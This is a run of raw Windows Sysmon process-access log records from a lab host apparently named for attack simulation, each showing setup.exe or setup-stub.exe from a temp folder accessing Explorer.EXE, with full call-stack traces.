10341000x800000000000000014959Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.380{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64) 10341000x800000000000000014958Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.380{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64) 10341000x800000000000000014957Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.380{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64) 10341000x800000000000000014956Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.380{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64) 10341000x800000000000000014955Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.380{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64) 10341000x800000000000000014954Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.380{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014953Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.380{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014952Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.380{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64) 10341000x800000000000000014951Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.380{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000014950Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.380{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64) 10341000x800000000000000014949Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.380{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64) 10341000x800000000000000014948Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.380{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64) 10341000x800000000000000014947Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.380{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014946Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.380{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014945Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.380{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000014944Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.380{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64) 10341000x800000000000000014943Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.380{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000014942Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.380{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000014941Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 